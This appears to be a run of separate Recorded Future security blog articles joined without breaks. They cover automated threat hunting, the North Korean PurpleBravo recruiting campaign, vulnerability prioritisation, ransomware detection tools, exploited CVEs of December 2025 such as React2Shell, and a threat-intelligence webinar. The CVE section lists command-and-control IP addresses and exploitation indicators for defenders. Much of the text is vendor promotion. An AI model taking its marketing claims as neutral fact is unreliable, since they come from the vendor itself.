Second, the speed and accessibility of automated threat hunting has proven invaluable during critical moments. When Steer read about Salt Typhoon making its way into corporate networks, he didn't need to schedule a meeting, assemble a team, or wait for the next sprint cycle. In the five minutes between meetings, he was able to launch a comprehensive threat hunt across Recorded Future's entire network to identify and mitigate associated risks to our systems.

That kind of rapid response would have been impossible with manual processes—and in today's threat landscape, that speed can mean the difference between containment and catastrophe.

The advantage of a single pane of glass

Another key benefit emerged around workflow efficiency. "Having a single pane of glass makes it a lot easier for an analyst to do not just the threat hunt, but also to see the meaning behind the IOCs that they're pulling back into the app," says Gallion. "Analysts don't like to have to get into a whole bunch of different applications. If we don't have to, it speeds things up and we can add context from inside the app."

This unified approach has eliminated the context-switching and tool-juggling that had often slowed down our security team and led to missed findings.

Why the Customer Zero experience matters

Serving as Customer Zero validated what we believed Autonomous Threat Operations could deliver to every customer: consistent, repeatable threat hunting that empowers analysts of all skill levels to defend their organizations more effectively. By testing the new solution within our own security operations first, we were able to identify what works, refine the capabilities that matter most, and prove that Autonomous Threat Operations isn't just a theoretical improvement—it's a practical solution that transforms daily security operations.

Gallion sums it up this way: "Some of the aspects of Autonomous Threat Operations that'll have the biggest impact are the repeatability, the scheduling of threat hunts to happen over time, and the single pane of glass that allows analysts to research IOCs in the app without having to go into multiple tools."

We saw a need for Autonomous Threat Operations, so we built it. Being Customer Zero enabled us to test it, refine it, and ensure that it’s the best possible solution to help our customers enter the era of the autonomous SOC.

Learn more about Autonomous Threat Operations by clicking here, or start operationalizing your threat intelligence now by booking a custom demo.

PurpleBravo is a North Korean state-sponsored threat group that overlaps with the “Contagious Interview” campaign first documented in November 2023. It targets software developers, especially in the software development and cryptocurrency verticals, via fake recruiter outreach, interview coding tests, and ClickFix prompts. Activity throughout 2025 has linked multiple fraudulent LinkedIn personas to PurpleBravo through malicious GitHub repositories and fictitious lure brands. The group’s tool set includes BeaverTail (a JavaScript infostealer and loader) and multi-platform remote access trojans (RATs), specifically, PyLangGhost and GolangGhost, optimized for stealing browser credentials and cryptocurrency wallet information.

Based on Recorded Future® Network Intelligence, Insikt Group identified 3,136 individual IP addresses concentrated in South Asia and North America linked to likely targets of PurpleBravo activity from August 2024 to September 2025. Twenty potential victim organizations were observed across the AI, cryptocurrency, financial services, IT services, marketing, and software development verticals in Europe, South Asia, the Middle East, and Central America. In several cases, it is likely that job-seeking candidates executed malicious code on corporate devices, creating organizational exposure beyond the individual target. Insikt Group observed PurpleBravo administering command-and-control (C2) servers via Astrill VPN and from IP ranges in China, with BeaverTail and GolangGhost C2 servers hosted across seventeen distinct providers.

Insikt Group distinguishes PurpleBravo (Contagious Interview) from PurpleDelta (North Korean IT workers) but has documented meaningful intersections. This includes a likely PurpleBravo operator displaying activity consistent with North Korean IT worker behavior, IP addresses in Russia linked to North Korean IT workers communicating with PurpleBravo C2 servers, and administration traffic from the same Astrill VPN IP address associated with PurpleDelta activity.

PurpleBravo presents an overlooked threat to the IT software supply chain. Because many targets are in the IT services and staff-augmentation industries with large public customer bases, compromises can propagate downstream to their customers. This campaign poses an acute software supply-chain risk to organizations that outsource development, particularly in regions where PurpleBravo concentrates its fictitious recruitment efforts.

Key Findings

• PurpleBravo employs a combination of fictitious personas, organizations, and websites to distribute malware to unsuspecting job seekers in the software development industry. Candidates sometimes use their corporate devices, thereby compromising their employers' security.
• PurpleBravo uses a variety of custom and open-source malware and tools in its operations, including BeaverTail, InvisibleFerret, GolangGhost, and PylangGhost.
• Using Recorded Future Network Intelligence, Insikt Group identified 3,136 individual IP addresses linked to likely targets of PurpleBravo activity and twenty potential victim organizations in the AI, cryptocurrency, financial services, IT services, marketing, and software development industries.
• Insikt Group has observed multiple points of overlap between PurpleBravo and PurpleDelta, Recorded Future’s designation for North Korean IT workers, indicating that some individuals may be active in both operations.
• PurpleBravo’s heavy targeting of the IT and software development industries in South Asia presents an overlooked and acute supply-chain risk to organizations that contract or outsource their IT services work.

• Traditional vulnerability management tools can no longer keep up with the speed of modern exploitation—threat context is now mandatory.
• Threat and Vulnerability Management (TVM) systems unify asset discovery, vulnerability data, and real-time external threat intelligence to prioritize real risk.
• Static CVSS scores fail to reflect exploitation likelihood; intelligence-driven, dynamic risk scoring is essential in 2026.
• Organizations that integrate vulnerability intelligence and attack surface intelligence reduce remediation time and security waste, enhancing detection and remediation while reducing alert fatigue.

Why Threat and Vulnerability Management Must Evolve in 2026

Security teams currently find themselves at a crossroads. Year over year, CVE volumes continue to surge higher and higher. Exploitation is faster, more automated, and more targeted, meaning attacks are growing in volume, velocity, and sophistication alike. As a result, security teams are expected to “patch faster” with fewer resources and can no longer realistically keep up with this ever-rising tide of threats.

Thanks to these forces, security teams have found themselves in a state of affairs in which vulnerability management has become an exercise in sheer volume, not risk. Day in and day out, teams are overwhelmed by alerts that lack real-world context, making it all but impossible to assess the actual degree of risk.

Thankfully, there is a solution. Threat-informed vulnerability management (TVM) has emerged to counteract this trend, enabling security teams to intelligently address weaponized vulnerabilities, zero-day exploits, and supply chain and cloud-native risk. All this comes along with much-needed relief from creeping alert-fatigue.

In 2026, effective cybersecurity programs will be defined not by how many vulnerabilities they detect but by how precisely they understand, prioritize, and neutralize real threats using intelligence-driven TVM systems.

The Core Problem: Alert Fatigue and Prioritization Failure

As it stands today, the explosion in disclosed vulnerabilities (CVEs) has outpaced humans’ abilities to triage and manage patching effectively. Today, the vast majority of organizations are incapable of remediating more than a fraction of the total identified issues affecting the ecosystem.

Traditionally, using a standard CVSS (Common Vulnerability Scoring System) was enough to overcome these challenges of prioritization. CVSS is an open, standardized framework used to assess the severity of security vulnerabilities by assigning a numerical score based on factors like exploitability, impact, and scope. Organizations use CVSS scores to prioritize remediation and compare vulnerabilities consistently across systems and vendors.

However, CVSS only measures theoretical severity, not exploitation likelihood. It misses critical pieces of context for prioritization decisions such as:

• Is exploit code available?
• Is the vulnerability actively exploited?
• Are threat actors discussing or operationalizing it?

As a result, high-severity CVEs that pose little real-world risk continue to consume time and resources, leading us back once again to the issue of alert fatigue and the inability to effectively triage and patch the most pressing vulnerabilities.

At the same time, we are seeing modern organizations struggle with a “silo problem,” in which security, IT, and CTI (cyber threat intelligence) teams operate independently and with limited visibility and collaboration between one another. In many organizations, each of these teams ends up using different tools, establishing different priorities, sharing findings infrequently if at all, and adopting entirely different “risk languages” through which they understand, prioritize, and address threats.

Taken broadly, this leaves organizations woefully lacking a unified, intelligence-driven view of risk. Without this, many adopt a de facto policy of “patch everything”. And it comes with significant costs, including:

• Operational drag and burnout
• Delayed remediation of truly dangerous vulnerabilities
• Increased business risk despite increased effort
• Fractured security operations

Both individually, and in the aggregate, these side-effects come at a significant detriment to organizational security. And as the number and diversity of CVEs continues to expand, the greater that cost becomes. Moving forward, organizations must find a better way.

The Evolving Threat Landscape Demands a New Approach

Today’s ever-changing landscape means that organizations must evolve along with it or risk falling dangerously behind. The rise of rapidly weaponized vulnerabilities (i.e., known software weaknesses that have moved beyond disclosure and into active attacker use) reflects a fundamental shift in how quickly and deliberately adversaries turn CVEs into operational threats. Today, the gap between disclosure, proof-of-concept release, and active exploitation has collapsed from months to days (or even hours), driven largely by exploit marketplaces, automated scanning, and widely shared tooling.

Attackers increasingly prioritize vulnerabilities that are easy to exploit, broadly applicable across cloud services, edge devices, and common dependencies, and capable of delivering fast returns. Once weaponized, these vulnerabilities manifest not as theoretical risk but as active intrusion campaigns, ransomware operations, and opportunistic internet-wide exploitation, making threat context essential for distinguishing true danger from background noise.

At the same time that weaponization is accelerating, attack surfaces are expanding. The average attack surface today is expanding and fragmenting across hybrid and multi-cloud environments, all of which is worsened by SaaS sprawl, shadow IT, and third-party and supply chain exposure. In this environment, it is absolutely critical that security teams have a clear understanding of vulnerabilities vs. threats, and work to establish an integrated approach between the two.

In short, a vulnerability is a technical weakness, while a threat is an actor, campaign or event at work exploiting that weakness. In order to be truly effective, modern threat vulnerability management (TVM) systems must merge both concepts to reflect real risk and separate signal from noise.

What Is Threat and Vulnerability Management (TVM)?

Threat and Vulnerability Management (TVM) — also called Threat-Informed Vulnerability Management — is a continuous, intelligence-driven process that prioritizes remediation based on three core variables:

• Active exploitation
• Threat actor behavior
• Asset criticality

TVM differs from traditional vulnerability management (VM) in a number of critical ways. Traditional VM relies on periodic scans, static severity scoring, and a largely reactive patching process. TVM, on the other hand, employs continuous monitoring, external threat intelligence enrichment, and close-loop remediation and validation.

This continuous, context-rich approach is foundational for modern security programs. Rather than inundating security teams with decontextualized CVEs and indiscriminate patching, modern TVM systems align security efforts with attacker reality. Reactive patching is replaced with proactive, risk-based decision-making, and as a result, organizations are able to reduce noise while simultaneously increasing the impact of their security operations.

The Five Core Pillars of Modern TVM Systems

As the speed and breadth of today’s threats continue to grow, traditional VM, being fundamentally reactive in nature, is no longer enough to keep up. In a world where vulnerabilities are exposed by the day, TVM offers much-needed efficiency, intelligence, and proactiveness. However, not all TVM systems are created equally. Here are five core pillars of effective modern TVM systems to help you evaluate and assess solutions on the market.

1. Continuous Asset Discovery & Inventory

Modern TVM systems are invaluable in that they provide full visibility across the entirety of an organization’s growing and fragmented attack surface. This includes external-facing assets, shadow IT, and cloud and SaaS environments alike. By providing continuous asset discovery and a timely, up-to-date inventory of one’s assets, TVM systems allow for real-time, comprehensive, attack-surface management.

Remember, you can’t defend what you can’t see. That’s why attack surface management (ASM) is a prerequisite for effective TVM. Without accurate, up-to-date asset inventories, vulnerability data is incomplete and misleading. Continuous discovery ensures defenders see their environment the way attackers do.

2. Vulnerability Assessment & Scoring

TVM goes beyond internal scanning tools to identify vulnerabilities exposed to the internet and reassess them continuously as environments change. This includes tracking misconfigurations, outdated services, and newly introduced exposure, not just known CVEs.

3. External Threat Context Enrichment

This is where TVM fundamentally diverges from legacy approaches. External threat intelligence enriches vulnerability data with insight from dark web and criminal forums, exploit marketplaces, malware telemetry, and active attack campaigns.

Vulnerabilities are mapped to known threat actors, active exploitation, and MITRE ATT&CK® techniques, ultimately transforming raw findings into actionable intelligence.

4. Risk-Based Prioritization (RBVM)

Risk-based vulnerability management prioritizes issues based on the probability of exploitation, asset importance, and threat actor interest. This shifts the focus from “most severe” to “most dangerous,” enabling teams to address the vulnerabilities that pose the greatest immediate risk to their organizations.

5. Automated Remediation & Verification

Modern TVM integrates directly with IT and SecOps workflows, pushing prioritized findings into ticketing and automation platforms. Just as importantly, it verifies remediation to confirm that patches were applied and exposure was actually reduced, creating a continuous feedback loop.

These five pillars of effective TVM systems come together to create a whole that is greater than the sum of its parts. These systems, unlike their predecessors, are designed to continuously monitor and triage real threats and vulnerabilities in context and ensure awareness and proactive mitigation without the risk of burn-out and alert fatigue.

Stop Patching Everything — Use Intelligence to Prioritize Real Risk

The scale of the CVE problem is overwhelming. Tens of thousands of vulnerabilities are disclosed each year, yet only a small fraction are ever exploited in the wild. Treating them all as equally urgent is not just inefficient — it’s dangerous.

Vulnerability intelligence changes the equation by tracking a CVE across its full lifecycle, from initial disclosure to weaponization, exploitation, and criminal adoption. This enables dynamic risk scoring that reflects real-world conditions rather than static assumptions.

Dynamic risk scoring incorporates evidence of active exploitation, availability of exploit code, dark web chatter, and threat actor interest. As conditions change, so does the risk score, ensuring prioritization remains aligned with attacker behavior.

The operational impact is significant. Security teams can focus remediation on the top 1% of vulnerabilities that pose immediate risk, respond faster, reduce operational cost, and strengthen overall security posture.

See Your Risk Like an Attacker: The Full Attack Surface View

In today’s threat landscape, security teams must recast the way they envision their roles. Rather than operating in a reactive, defensive manner at all times, security teams should think more like their adversaries, taking a complete view of their attack surface and leveraging modern tools and technologies to ensure intelligent, prioritized defenses. The following three key concepts will help you take on that mentality.

1. The Visibility Gap: Unknown assets create unknown risk. Traditional scanners often miss orphaned domains, misconfigured cloud services, and forgotten infrastructure — precisely the assets attackers look for first.
2. Attack Surface Intelligence Explained: Attack surface intelligence provides continuous mapping of domains, IPs, cloud assets, and external services. It identifies exposures attackers see before defenders do, enabling proactive remediation rather than reactive cleanup.
3. Connecting the Dots with Vulnerability Tools: When integrated with vulnerability scanners like Qualys and Tenable, attack surface intelligence provides a unified, prioritized view of exposure. Intelligence-driven platforms serve as a single source of truth for risk decisions, enabling teams to connect vulnerabilities to real-world exposure and threat activity.

Three Strategic Recommendations for Security Leaders

Most organizations remain behind the curve in threat and vulnerability management. Knowing what we know now, there are three strategic steps security leaders can take to reclaim control.

1. Bridge the Gap Between Security and IT

Establish a shared, intelligence-driven risk language. Align SLAs with real-world risk rather than raw severity scores, ensuring remediation efforts focus on what matters most.

2. Embrace Automation and Workflow Integration

Push prioritized findings directly into platforms like ServiceNow and SOAR tools. Reducing manual handoffs accelerates remediation and minimizes delays.

3. Measure What Matters — Time-to-Remediate (TTR)

Shift KPIs toward time-to-remediate actively exploited vulnerabilities and reduction in exposure windows. These metrics demonstrate real ROI and security impact.

The Path Forward Is Threat-Informed: Strengthen Your Threat and Vulnerability Strategy

Volume-based vulnerability management is no longer viable. As we progress through 2026, threat context is not optional. It is foundational.

Future-ready security programs are intelligence-led, automation-enabled, and attacker-aware. Recorded Future sits at the center of this shift, providing the intelligence backbone required to move from reactive patching to proactive risk reduction.

Explore how Recorded Future Vulnerability Intelligence and Attack Surface Intelligence can help your organization transition from alert-driven vulnerability management to intelligence-driven risk reduction.

By unifying threat intelligence, vulnerability data, and attack surface visibility, organizations can reduce alert fatigue, prioritize what truly matters, and proactively harden defenses against real-world threats before attackers exploit them.

• Effective ransomware detection requires three complementary layers: endpoint and extended detection and response (EDR/XDR) to monitor device-level activity, network detection and response (NDR) to catch lateral movement, and threat intelligence tools to provide context that enables efficient prioritization.
• The most valuable detection happens before ransomware encryption begins. Tools must identify precursor behaviors like reconnaissance, credential theft, and data staging rather than waiting for known indicators of compromise.
• Intelligence quality determines detection quality: even sophisticated security tools require real-time threat data about active ransomware campaigns, attacker infrastructure, and current tactics, techniques, and procedures (TTPs) to distinguish genuine threats from noise.
• Recorded Future strengthens the entire detection stack by providing organization-specific threat intelligence, early detection capabilities (in some cases, identifying victims up to 30 days before public extortion), and vulnerability intelligence focused on what ransomware groups are actively exploiting.

Introduction

The ransomware playbook has fundamentally changed. Instead of casting wide nets with opportunistic phishing campaigns, attackers now focus on big-game hunting: targeting high-value enterprises with data theft and double or triple extortion tactics. Threat actors purchase pre-compromised access from brokers, exploit newly disclosed vulnerabilities within hours, and use automation to compress weeks-long campaigns into days.

The results are stark. Ransomware now appears in 44% of breaches, up from 32% the prior year, according to the 2025 Verizon Data Breach Investigations Report. Traditional signature-based detection tools often can't keep pace because ransomware groups continuously rotate their infrastructure, modify malware variants, and adopt new tactics faster than defenses can update. By the time a signature is written, the threat has already evolved.

This gap has created demand for a different approach: intelligence-driven ransomware detection. Rather than waiting for known indicators of compromise, these tools identify the precursor behaviors that happen before encryption (e.g. reconnaissance, credential theft, lateral movement, privilege escalation, and data staging).

The key is continuous external intelligence that maps what's happening in your environment to active campaigns and specific ransomware families operating in the wild.

The most effective defense combines three layers: endpoint and extended detection and response (EDR/XDR) to catch suspicious behaviors on devices, network detection and response (NDR) with deception technology to spot lateral movement, and threat intelligence tools that provide the real-time context tying it all together. When these tools share a common intelligence foundation, they can reveal malicious intent well before encryption begins.

The Ransomware Detection Tool Landscape: Three Pillars of Defense

Effective ransomware detection generally requires three complementary tool categories, each targeting different stages of an attack.

1. Endpoint and Extended Detection and Response (EDR/XDR) Tools

EDR and XDR platforms form the first line of defense, monitoring individual devices and user activity for signs of compromise.

Core Functionality

EDR and XDR solutions monitor endpoints for suspicious behaviors like privilege escalation, credential dumping, unusual process creation, and bulk file modifications. When they detect threats, these tools automatically isolate devices, roll back changes, and contain threats, cutting response time from hours to seconds.

How Threat Intelligence Enhances EDR/XDR

Threat intelligence connects endpoint activity to active campaigns in the wild. When an EDR tool flags suspicious activity, intelligence context reveals whether it matches known campaigns from groups like LockBit, ALPHV/BlackCat, or BlackBasta. This can dramatically reduce false positives by distinguishing unusual-but-legitimate administrative work from activity aligned with active ransomware operations.

Example Tools

• CrowdStrike Falcon delivers strong behavioral detection capabilities tied to comprehensive actor profiling. The platform's threat graph continuously correlates endpoint telemetry with global threat intelligence, enabling rapid identification of ransomware precursors.
• Microsoft Defender XDR integrates telemetry across identity systems, endpoints, email, and cloud applications. This unified visibility helps security teams identify cross-domain attack patterns that indicate ransomware preparation, such as credential theft followed by lateral movement.
• SentinelOne employs behavioral AI to detect malicious activity and offers automated rollback features that can reverse ransomware encryption and file modifications, effectively restoring systems to their pre-attack state.

2. Network Detection and Response (NDR) Tools

While EDR focuses on individual endpoints, NDR tools monitor the network layer to catch attackers as they move between systems.

Core Functionality

NDR platforms watch internal network traffic to catch attackers moving laterally, scanning for targets, or accessing resources they shouldn't. The more advanced versions include deception technology like honeypots, fake credentials, and decoy systems that look like attractive targets. When attackers interact with these decoys during reconnaissance, security teams get early warnings before any real damage occurs.

How Threat Intelligence Improves NDR and Deception

Threat intelligence helps organizations customize deception environments based on active ransomware groups in their industry. When NDR tools spot anomalies such as unusual file sharing, unexpected queries, or abnormal transfers, intelligence matches these to current attack techniques, distinguishing administrative work from reconnaissance patterns before data staging begins.

Example Tools

• Vectra AI specializes in detecting lateral movement and privilege misuse by correlating network behaviors with active attacker tradecraft. The platform's AI-driven detection identifies subtle deviations from normal network patterns that indicate ransomware reconnaissance.
• ExtraHop Reveal(x) provides real-time network visibility that identifies reconnaissance activity and command-and-control (C2) communications. The platform's deep packet inspection capabilities reveal malicious traffic even when encrypted or obfuscated.
• Illusive (now part of Zscaler) deploys deception technology specifically tuned to adversary behaviors. The platform's decoys and fake credentials create a minefield for attackers, triggering high-confidence alerts when threat actors interact with deception assets.

3. Threat Intelligence Tools

The third pillar provides the context that makes endpoint and network detection tools more accurate and actionable.

Core Functionality

Threat intelligence tools pull together global threat data from sources like dark web forums, malware repositories, scanning activity, and criminal infrastructure. They enrich alerts from your other security tools with context about who's behind an attack, which campaign it's part of, and what techniques the attackers are likely to use next.

How Threat Intelligence Strengthens Ransomware Detection

These tools deliver several critical capabilities that transform how security teams identify and respond to ransomware threats:

• Threat Mapping: Identifies whether your organization matches the targeting profile of active ransomware groups based on your industry, size, region, and technology stack. Specific operators are mapped using their TTPs to determine the intent and opportunity of carrying out a successful attack against your business.
• Infrastructure Tracking: Monitors ransomware operators' continuous infrastructure shifts in real-time, identifying new C2 servers, drop sites, and payment infrastructure as they emerge.
• Variant Identification: Rapidly analyzes and disseminates indicators when ransomware groups release new malware variants, enabling detection before signature-based systems receive updates.
• Exploitation Intelligence: Identifies specific CVEs and misconfigurations that attackers are actively weaponizing, moving vulnerability management from severity-score-driven to threat-driven prioritization.
• Risk Scoring: Provides real-time scores combining multiple intelligence signals—indicator prevalence, campaign association, TTP alignment—to guide analysts toward genuine threats rather than generic suspicious activity.

Example Tools

• Recorded Future delivers organization-specific threat intelligence powered by The Intelligence Graph and proprietary AI. The platform provides end-to-end visibility into exposures, while research from its Insikt Group enables early detection of ransomware activity, identifying potential victims up to 30 days before public extortion.
• Flashpoint specializes in deep and dark web intelligence, monitoring criminal forums, marketplaces, and chat channels where ransomware operators communicate, recruit, and trade access. This visibility into adversary communities provides early warnings about emerging threats and campaigns.
• Google Threat Intelligence (formerly Mandiant) combines frontline incident response insights with global threat tracking. The platform leverages intelligence from breach investigations to identify ransomware group behaviors and attack patterns as they emerge.

Choosing the Right Ransomware Detection Tools

Security leaders must distinguish between tools that reduce ransomware risk and those that add noise. The most effective tools share several characteristics.

Security leaders should prioritize:

• Pre-encryption visibility: Detect credential misuse, suspicious access, and lateral movement during reconnaissance and preparation phases when interventions are most effective.
• Context-rich alerts: Alerts should include TTPs, infrastructure associations, and known actor activity and explain not just what triggered an alert but why it matters.
• Integration maturity: Smooth data flow into SIEM, SOAR, and existing investigation workflows without creating siloed intelligence or blind spots.
• Operational efficiency: Tools should reduce alert noise, not add to it, decreasing time-to-detection and time-to-response.
• Relevance: Intelligence must map to current campaigns. Generic or stale indicators waste analyst time and create false confidence.
• Scalability: Handle hybrid environments spanning on-premises infrastructure, multiple cloud providers, and remote endpoints without performance degradation.

How Recorded Future Enables Early Ransomware Detection

The quality of threat intelligence directly determines detection effectiveness. Even sophisticated endpoint and network tools require high-fidelity, current threat data to generate value. Security teams have plenty of options for tools; the real challenge is addressing alert fatigue draining analyst time on false positives instead of credible threats.

Recorded Future functions as the continuous intelligence layer strengthening the entire detection stack. Rather than adding another alert-generating tool, it feeds existing security ecosystems with real-time context about ransomware operator behavior.

Real-Time Relevance Through SecOps Intelligence

Every alert that hits your SIEM or endpoint platform gets automatically enriched with real-time risk scores, associated malware and infrastructure, and links to known attacker techniques and campaigns. Security tools can immediately recognize whether an indicator matches an active ransomware operation, cutting triage time from hours to minutes.

Proactive Mitigation Through Vulnerability Intelligence

Recorded Future identifies which vulnerabilities ransomware groups are actually exploiting right now, not just which ones have the highest theoretical severity ratings. This distinction matters because most high-severity vulnerabilities never get exploited in the wild, while some medium-severity vulnerabilities become critical the moment ransomware operators weaponize them.

The platform shows you which vulnerabilities specific ransomware groups are targeting, where exploit code is available, and which vulnerabilities are generating buzz in criminal forums. This lets security teams prioritize patching based on what attackers are actually doing, focusing on the access vectors most likely to result in ransomware incidents.

Victimology and Anticipation

Intelligence about dark web chatter, leak site activity, and victimology patterns reveals which industries, geographies, and technologies are being targeted. When Recorded Future detects increased targeting of specific sectors, SOC analysts can anticipate attack paths, tighten access controls, and implement protective measures before campaigns reach their network.

This closes the gap between reconnaissance and encryption. Most traditional tools don't trigger alerts until ransomware starts encrypting systems, by which point attackers have already stolen data. Intelligence-driven detection can catch the reconnaissance, credential theft, and lateral movement phases that happen first, shifting your response window from reactive damage control to proactive early containment.

Shifting From Reactive Response to Intelligence-Led Prevention

No single tool stops ransomware. The strongest defense is an integrated ecosystem where endpoint detection, network monitoring, and threat analysis platforms work from the same intelligence foundation.

Intelligence elevates these tools from reactive detection to early recognition of adversary behavior during preparation and reconnaissance phases, enabling intervention before ransomware reaches its destructive phase. Organizations that build detection architecture on real-time threat intelligence will adapt as quickly as their adversaries, maintaining effective defenses as the threat landscape evolves.

What security teams need to know:

• React2Shell pandemonium: CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families
• China-nexus exploitation intensifies: Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations
• Public exploits proliferate: Eleven of 22 vulnerabilities have proof-of-concept code available, accelerating exploitation timelines
• Legacy vulnerabilities resurface: CISA added 2018-2022 era flaws to its Known Exploited Vulnerabilities (KEV) catalog, highlighting persistent patch gaps

Bottom line: December's surge reflects both new zero-days and renewed interest in legacy vulnerabilities. React2Shell alone demonstrates how quickly modern web frameworks can become global attack vectors.

Quick Reference Table

All 22 vulnerabilities below were actively exploited in December 2025.

Table 1: List of vulnerabilities that were actively exploited in December based on Recorded Future data (Source: Recorded Future)

Key Trends in December 2025

Affected Vendors

• Fortinet continued vulnerability concerns with two critical authentication bypass flaws
• Google faced three vulnerabilities across Android (2) and Chromium (1) platforms
• Microsoft dealt with a Windows kernel use-after-free vulnerability
• Meta experienced the month's most impactful vulnerability with React2Shell
• Additional affected vendors: Array Networks, Gogs, Gladinet, ASUS, Cisco, Apple, SonicWall, WatchGuard, MongoDB, Digiever, Sierra Wireless, OSGeo, RARLAB, D-Link, and OpenPLC

Most Common Weakness Types

• CWE-22 – Path Traversal
• CWE-347 – Improper Verification of Cryptographic Signature
• CWE-416 – Use After Free
• CWE-434 – Unrestricted Upload of File with Dangerous Type
• CWE-787 – Out-of-bounds Write

Threat Actor Activity

React2Shell exploitation dominated December’s CVE activity:

• Threat actors observed to have exploited this vulnerability:
  • China-nexus actors Earth Lamia and Jackpot Panda
  • China-linked clusters UNC6600, UNC6586, UNC6588, UNC6603, and UNC6595
  • North Korea-linked and financially motivated groups
• Observed payloads included EtherRAT, PeerBlight, CowTunnel, ZinFoq, Kaiji variants, Zndoor, RondoDox, MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, ANGRYREBEL.LINUX, and Weaxor ransomware (using a Cobalt Strike stager)
• Infrastructure connections to HiddenOrbit relay infrastructure and GobRAT relay component

Additional activity:

• UAT-9686 exploited Cisco Secure Email Gateway (CVE-2025-20393), deploying AquaShell, AquaPurge, and AquaTunnel
• Unknown actors leveraged Gogs vulnerability (CVE-2025-8110) for Supershell malware deployment

Priority Alert: Active Exploitation

These vulnerabilities demand immediate attention due to confirmed widespread exploitation.

CVE-2025-55182 | Meta React Server Components (React2Shell)

Risk Score: 99 (Very Critical) | CISA KEV: Added December 5, 2025

Why this matters: Unauthenticated RCE affects React and Next.js, among the world's most popular web frameworks. Multiple threat actors are actively exploiting vulnerable instances with diverse malware payloads.

Affected versions:

• React packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack (19.0.0, 19.1.0, 19.1.1, and 19.2.0)
• Next.js: 15.x, 16.x, and Canary builds from 14.3.0-canary.77
• Also affects: React Router, Waku, RedwoodSDK, Parcel, Vite RSC plugin

Immediate actions:

• Upgrade React to 19.0.3, 19.1.4, or 19.2.3 immediately
• Update Next.js to 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, or 15.0.5
• Monitor for unusual multipart/form-data POST requests consistent with Next.js Server Actions / RSC endpoints
• Check logs for E{"digest" error patterns indicating exploitation attempts
• Review server processes for unexpected Node.js child processes

Exposure: ~310,500 Next.js instances on Shodan (US, India, Germany, Japan, Australia)

Figure 1: Vulnerability Intelligence Card® for CVE-2025-55182 (React2Shell) in Recorded Future (Source: Recorded Future)

CVE-2025-20393 | Cisco Secure Email Gateway

Risk Score: 99 (Very Critical) | Active exploitation by UAT-9686

Why this matters: Chinese threat actors are actively compromising email security infrastructure to establish persistent access and pivot into internal networks.

Affected products: Cisco Secure Email Gateway and Secure Email and Web Manager running AsyncOS

Immediate actions:

• Apply Cisco's security updates immediately
• Monitor Spam Quarantine web interface access logs
• Check for modifications to /data/web/euq_webui/htdocs/index.py
• Hunt for AquaShell, AquaPurge, and AquaTunnel indicators
• Review outbound connections to suspicious IPs

Known C2 infrastructure: 172.233.67.176, 172.237.29.147, 38.54.56.95 (inactive)

• Intelligence drives better decisions. High-performing teams use threat intelligence not just for detection, but to inform strategic business decisions and communicate risk to leadership.
• Maturity means efficiency. Advanced programs focus on automation, high-fidelity indicators, and cross-functional collaboration—freeing analysts to concentrate on strategic initiatives.
• Information overload is the top challenge. Teams need better integrations and AI-powered tools to transform massive data volumes into actionable insights.
• AI will reshape the analyst role. While junior analysts won't be replaced, their workflows will evolve significantly as AI augments their capabilities.

Recorded Future recently hosted two webinars to unpack key insights from the 2025 State of Threat Intelligence Report and hear directly from customers who are putting these findings into practice.

Based on survey responses from 615 cybersecurity executives and practitioners, the report showed clear industry trends. Threat intelligence spending is up, with 76% of organizations spending over $250,000 annually and 91% planning to increase spending in 2026. Even more critically, 87% said they expect to advance the maturity of their threat intelligence programs over the next two years.

But what does maturity actually look like in practice? Our customers offered candid perspectives on how they're turning intelligence into impact.

Intelligence as a strategic asset

Our webinar panelists noted that the availability of rich threat intelligence has transformed how their organizations approach decision-making. According to Jack Watson, Senior Threat Intelligence Analyst at Global Payments, “Understanding that one alert opened and one alert closed does not necessarily equate to one single adversary being stopped” has led his team to take “a much more holistic approach to looking at problems.”

Omkar Nimbalkar, Senior Manager of Cyber Threat Research and Intelligence at Adobe, said, “Once you start doing this work day in and day out, you uncover patterns in your environment. You uncover what your posture looks like, where your true risk resides, and you can use that as a means to inform the business on the changing threat landscape for better decision-making.”

Ryan Boyero, Recorded Future’s Senior Customer Success Manager, said context and storytelling are key benefits of threat intelligence. “You can have a precursor or malicious activity that has occurred,” he said, “but without threat intelligence, you can’t really tell the story or paint the picture to deliver to senior leadership in order to help make the best and informed decisions possible.”

How threat intelligence delivers organization-wide value

Nimbalkar said his team provides tailored threat intelligence to business units and product teams across Adobe so they can monitor for specific behavioral activities and block specific threats in their environments.

Boyero shared that Recorded Future customers in EMEA use threat intelligence to educate leadership. “We're able to inform leaders,” he said. “We're able to speak with executives, get them in the room, not so much scare them that a situation could happen or has happened, but ultimately just educate and let them know that this is what Recorded Future is able to do and how we can bring success to the table.”

Erich Harbowy, Security Intelligence Engineer at Superhuman, said that in addition to educating leaders about risk, his team also uses threat intelligence to show the value of their work. “Not only am I using this very current news, I am also using the statistics that come along with that,” he said. “How much damage occurred during the first attack that was similar to this? And are [my adversaries] done? Are they coming back?”

Harbowy appreciates Recorded Future for providing those insights for postmortems and follow-ups with executives. “How do I prove my worth?” he said. “Give me the intel.”

The anatomy of a mature threat intelligence program

According to Nimbalkar, maturity comes when the foundational tactical and operational work is complete. He said that advancing a threat intelligence program is all about efficiency and optimization, including making sure you have high-fidelity indicators so your noise-to-signal ratio is reduced and you have higher-quality detections, understanding who your adversaries are and how they’re targeting you, getting in front of stakeholders and engaging with cross-functional teams, and collecting metrics on everything you do.

“Once you have figured out all these workflows, automated as much as you can, optimized and made it efficient, and then you focus more on risk reduction across the environment and more on strategic initiatives, that’s a very good maturation,” he said.

Jack Watson of Global Payments described threat intelligence maturity as the ability to ingest and action intelligence. “It’s never been easier to ingest data, but it’s also never been harder to sift through [that data]. So we’re seeing more mature organizations developing automated workflows, developing custom capabilities to do collection and action, and using AI in unique ways.”

Pathways to advancing maturity

Nick Rainho, Senior Intelligence Consultant at Recorded Future, said that the key to advancing maturity is having solid intelligence requirements. “Especially if you’re working with limited resources, go for the low-hanging fruit and ensure that the intelligence you’re pulling in is relevant to senior leadership’s priorities.”

Ryan Boyero agreed that maturity success is predicated on understanding leadership’s key requirements. “And then, how are we able to work towards that greater good and define success together?”

Top challenges for CTI teams

